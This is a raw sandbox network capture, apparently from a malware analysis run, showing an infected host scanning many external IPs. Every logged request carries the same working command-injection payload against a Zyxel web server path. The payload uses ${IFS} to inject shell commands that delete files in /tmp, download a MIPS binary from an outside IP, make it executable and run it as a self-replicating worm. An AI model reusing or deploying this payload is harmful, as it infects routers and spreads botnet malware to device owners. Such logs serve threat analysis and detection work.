                                            Jan 14, 2024 15:50:42.466898918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5209192.168.2.233421463.193.232.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466939926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5210192.168.2.235288820.87.119.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466948032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5211192.168.2.233488696.7.158.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467006922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5212192.168.2.2338206221.208.137.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467017889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5213192.168.2.235865252.170.101.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467042923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5214192.168.2.234770687.29.255.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467076063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5215192.168.2.2360406123.173.170.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467101097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5216192.168.2.2338262153.115.224.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467124939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5217192.168.2.2340706188.211.191.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467159986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5218192.168.2.234734660.210.235.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467196941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5219192.168.2.2338844141.47.160.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467223883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5220192.168.2.2350264209.100.187.49443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467252016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5221192.168.2.2359116100.152.69.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467267990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5222192.168.2.2337686128.111.153.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467293978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5223192.168.2.234912663.134.88.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467318058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5224192.168.2.233929658.65.34.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467364073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5225192.168.2.2357918189.162.188.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467396975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5226192.168.2.233744288.85.137.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467427015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5227192.168.2.2359680107.242.149.245443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467449903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5228192.168.2.234382453.3.129.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467485905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5229192.168.2.2333618165.96.134.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467494965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5230192.168.2.2345164102.170.103.120443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467513084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5231192.168.2.2348788145.226.157.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467536926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5232192.168.2.2348568112.80.26.35443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467575073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5233192.168.2.233665467.30.101.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467616081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5234192.168.2.2340310122.193.40.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467629910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5235192.168.2.2359206158.6.150.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467681885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5236192.168.2.235178891.88.162.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467715979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5237192.168.2.2342202161.61.103.35443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467736006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5238192.168.2.2339996200.158.23.167443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467768908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5239192.168.2.234437098.130.42.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467808962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5240192.168.2.2340052185.20.131.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467824936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5241192.168.2.2334904104.12.146.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467854023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5242192.168.2.235959268.38.113.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467870951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5243192.168.2.2355114186.93.187.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467896938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5244192.168.2.235523647.236.69.191443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467936039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5245192.168.2.235228086.120.111.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467977047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5246192.168.2.2342756152.168.66.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.467999935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5247192.168.2.235711477.110.39.59443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468013048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5248192.168.2.2342308103.209.235.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468034983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5249192.168.2.2359886176.188.214.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468103886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5250192.168.2.2344710150.255.68.134443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468138933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5251192.168.2.235889435.118.194.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468179941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5252192.168.2.2356908206.70.203.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468199015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5253192.168.2.2334102219.210.128.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468204975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5254192.168.2.2340220183.232.35.0443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468269110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5255192.168.2.236099852.209.149.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468287945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5256192.168.2.2351370139.152.7.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468333960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5257192.168.2.235045443.155.52.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468348980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5258192.168.2.2334230150.116.199.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468386889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5259192.168.2.233430080.151.191.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468417883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5260192.168.2.2350760153.125.203.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468427896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5261192.168.2.2339698146.148.195.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468434095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5262192.168.2.234975067.91.58.244443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468449116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5263192.168.2.2349236116.115.158.115443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468485117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5264192.168.2.2348550175.190.80.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468523026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5265192.168.2.2350262165.169.214.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468555927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5266192.168.2.2353688161.217.164.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468564034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5267192.168.2.2338408200.164.60.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468585968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5268192.168.2.2347320170.242.32.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468633890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5269192.168.2.233864427.78.44.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468666077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5270192.168.2.234558032.135.147.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468671083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5271192.168.2.2354106217.101.124.137443
                                            TimestampBytes transferredDirectionData
